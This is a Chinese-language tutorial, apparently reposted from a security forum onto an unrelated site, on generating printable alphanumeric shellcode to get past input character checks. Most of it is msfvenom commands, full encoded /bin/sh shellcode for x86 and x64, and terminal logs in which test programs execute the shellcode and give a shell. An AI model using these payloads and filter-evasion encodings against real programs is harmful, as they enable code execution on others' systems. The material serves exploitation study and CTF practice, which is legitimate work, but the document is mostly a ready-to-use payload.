生成可打印的shellcode | 宜武汇-ag真人国际厅网站

有时候程序会对我们的payload进行一些可打印检查,比如进行 utf-8 编码等,这时候一般的 shellcode 是无法绕过检查的,这时候就需要我们对 shellcode 进行编码。

通过对网上资料的总结,找到了两种比较好的编码方法。

x86编码

x86编码的话用msf内置的encoder就行了。

ex@ex:~$ msfvenom -l encoders framework encoders [--encoder ] ====================================== name rank description ---- ---- ----------- cmd/brace low bash brace expansion command encoder cmd/echo good echo command encoder cmd/generic_sh manual generic shell variable substitution command encoder cmd/ifs low bourne ${ifs} substitution command encoder cmd/perl normal perl command encoder cmd/powershell_base64 excellent powershell base64 command encoder cmd/printf_php_mq manual printf(1) via php magic_quotes utility command encoder generic/eicar manual the eicar encoder generic/none normal the "none" encoder mipsbe/byte_xori normal byte xori encoder mipsbe/longxor normal xor encoder mipsle/byte_xori normal byte xori encoder mipsle/longxor normal xor encoder php/base64 great php base64 encoder ppc/longxor normal ppc longxor encoder ppc/longxor_tag normal ppc longxor encoder ruby/base64 great ruby base64 encoder sparc/longxor_tag normal sparc dword xor encoder x64/xor normal xor encoder x64/xor_dynamic normal dynamic key xor encoder x64/zutto_dekiru manual zutto dekiru x86/add_sub manual add/sub encoder x86/alpha_mixed low alpha2 alphanumeric mixedcase encoder x86/alpha_upper low alpha2 alphanumeric uppercase encoder x86/avoid_underscore_tolower manual avoid underscore/tolower x86/avoid_utf8_tolower manual avoid utf8/tolower x86/bloxor manual bloxor - a metamorphic block based xor encoder x86/bmp_polyglot manual bmp polyglot x86/call4_dword_xor normal call 4 dword xor encoder x86/context_cpuid manual cpuid-based context keyed payload encoder x86/context_stat manual stat(2)-based context keyed payload encoder x86/context_time manual time(2)-based context keyed payload encoder x86/countdown normal single-byte xor countdown encoder x86/fnstenv_mov normal variable-length fnstenv/mov dword xor encoder x86/jmp_call_additive normal jump/call xor additive feedback encoder x86/nonalpha low non-alpha encoder x86/nonupper low non-upper encoder x86/opt_sub manual sub encoder (optimised) x86/service manual register service x86/shikata_ga_nai excellent polymorphic xor additive feedback encoder x86/single_static_bit manual single static bit x86/unicode_mixed manual alpha2 alphanumeric unicode mixedcase encoder x86/unicode_upper manual alpha2 alphanumeric unicode uppercase encoder x86/xor_dynamic normal dynamic key xor encoder

但是现在(2019-07-13)msf中还没有x64alpha_upper编码方式。

使用msf时,可以用内置的shellcode,其命令如下:

msfvenom -a x86 --platform linux -p linux/x86/exec cmd="/bin/sh" -e x86/alpha_upper bufferregister=eax

bufferregister指的是指向shellcode的寄存器的值

如果不声明bufferregister的话,生成的shellcode会有额外的几条指令来确定shellcode的位置,而那几条额外的指令却并不是可打印字符。

其结果如下所示:

ex@ex:~/test$ msfvenom -a x86 --platform linux -p linux/x86/exec cmd="/bin/sh" -e x86/alpha_upper -f python found 1 compatible encoders attempting to encode payload with 1 iterations of x86/alpha_upper x86/alpha_upper succeeded with size 155 (iteration=0) x86/alpha_upper chosen with final size 155 payload size: 155 bytes final size of python file: 750 bytes buf = "" buf  = "\x89\xe7\xda\xd1\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49" buf  = "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33" buf  = "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41" buf  = "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41" buf  = "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a" buf  = "\x4a\x49\x32\x4a\x44\x4b\x36\x38\x4a\x39\x56\x32\x33" buf  = "\x56\x45\x38\x56\x4d\x53\x53\x4d\x59\x4d\x37\x35\x38" buf  = "\x56\x4f\x32\x53\x52\x48\x53\x30\x55\x38\x46\x4f\x53" buf  = "\x52\x35\x39\x32\x4e\x4b\x39\x4d\x33\x36\x32\x5a\x48" buf  = "\x44\x48\x53\x30\x53\x30\x35\x50\x36\x4f\x42\x42\x42" buf  = "\x49\x52\x4e\x46\x4f\x54\x33\x35\x38\x43\x30\x31\x47" buf  = "\x36\x33\x4b\x39\x4b\x51\x58\x4d\x4d\x50\x41\x41"

第二种,我们可以用msf来编码自己写的shellcode,其命令如下:

其运行结果如下:

ex@ex:~/test$ cat shellcode | msfvenom -a x86 --platform linux -e x86/alpha_upper bufferregister=eax attempting to read payload from stdin... found 1 compatible encoders attempting to encode payload with 1 iterations of x86/alpha_upper x86/alpha_upper succeeded with size 103 (iteration=0) x86/alpha_upper chosen with final size 103 payload size: 103 bytes pyiiiiiiiiiiqzvtx30vx4ap0a3hh0a00abaabtaaq2ab2bb0bbxp8acjjirj4k68j90rcxvo6o43e82hvoe2sybnmyks01xihmmpaa

x64编码

其命令如下:

运行结果如下:

ex@ex:~/test/shellcode_encoder$ hexdump -c shellcode 00000000 48 b8 2f 62 69 6e 2f 73 68 00 50 48 89 e7 48 31 |h./bin/sh.ph..h1| 00000010 f6 48 f7 e6 b8 3b 00 00 00 0f 05 |.h...;.....| 0000001b ex@ex:~/test/shellcode_encoder$ python2 main.py shellcode rax 29 encoding stage2 488b0432 => 4863343a31343a53582d402874332d5020605f35383c2f5f505e31343a57582d7e5b775f2d3f61682c2d3f432074505f 480faf44 => 4863343a31343a53582d713b40412d704520413557703039505e31343a57582d7e5b775f2d3f61682c2d3f432074505f 32084889 => 4863343a31343a53582d244874202d5f606c20354f5f5736505e31343a57582d7e5b775f2d3f61682c2d3f432074505f 043a83c7 => 4863343a31343a53582d402233402d41602020357b472f58505e31343a57582d7e5b775f2d3f61682c2d3f432074505f 0883c610 => 4863343a31343a53582d402646612d502220413578345f4d505e31343a57582d7e5b775f2d3f61682c2d3f432074505f 85c075e8 => 4863343a31343a53582d202022202d20407e4035455f2a77505e31343a57582d7e5b775f2d3f61682c2d3f432074505f multiply-encoding stage3 48b82f62696e2f73 => 413553575a25252e 483e23646d6e2b73 6800504889e74831 => 415462524c61643a 684654484b634c35 f648f7e6b83b0000 => 4163795c343a7931 7649363a204f3a3b 000f059090909090 => 3c3b77625b273220 40707d593b5c7463 assembling jump at  408 encoding preamble for rdx <- rax 29 pptayaxvi31vxxxf-cof-@hf-@hpz original length: 27 encoded length: 476 preamble length: 29 total length: 505 pptayaxvi31vxxxf-cof-@hf-@hpztayaxvi31vxpp[_hc4:14:sx-@(t3-p `_58~?p_hc4:14:sx-"* -e6 5f}//p^14:wx-~[w_-?ah,-?c tp_sx- a""- ?~~5\~__p^sx-@@@"-y``~5____p_aaaaa5swz%%.h>#dmn satbrlad:hfthkcl5acy\4:y1vi6: o:;<;wb['2 @p}y;\tc

在这个程序中,正常的 shellcode 会被直接绊住,所以就可以利用上面编码过的shellcode。

其结果如下:

ex@ex:~/test$ file printable32 printable32: elf 32-bit lsb shared object, intel 80386, version 1 (sysv), dynamically linked, interpreter /lib/ld-, for gnu/linux 3.2.0, buildid[sha1]=6bbd4307de7e93dcda81bef0f16617415b14ec17, not stripped ex@ex:~/test$ ./printable32 pyiiiiiiiiiiqzvtx30vx4ap0a3hh0a00abaabtaaq2ab2bb0bbxp8acjjirj4k68j90rcxvo6o43e82hvoe2sybnmyks01xihmmpaa $ id uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker) $ exit ex@ex:~/test$ file printable64 printable64: elf 64-bit lsb shared object, x86-64, version 1 (sysv), dynamically linked, interpreter /lib64/l, for gnu/linux 3.2.0, buildid[sha1]=9d51fb0464f69bae2eb982d538eaee094d5b501b, not stripped ex@ex:~/test$ ./printable64 pptayaxvi31vxxxf-cof-@hf-@hpztayaxvi31vxpp[_hc4:14:sx-@(t3-p `_58~?p_hc4:14:sx-"* -e6 5f}//p^14:wx-~[w_-?ah,-?c tp_sx- a""- ?~~5\~__p^sx-@@@"-y``~5____p_aaaaa5swz%%.h>#dmn satbrlad:hfthkcl5acy\4:y1vi6: o:;<;wb['2 @p}y;\tc $ id uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker) $

原文链接:https://xz.aliyun.com/t/5662

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/生成可打印的shellcode/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图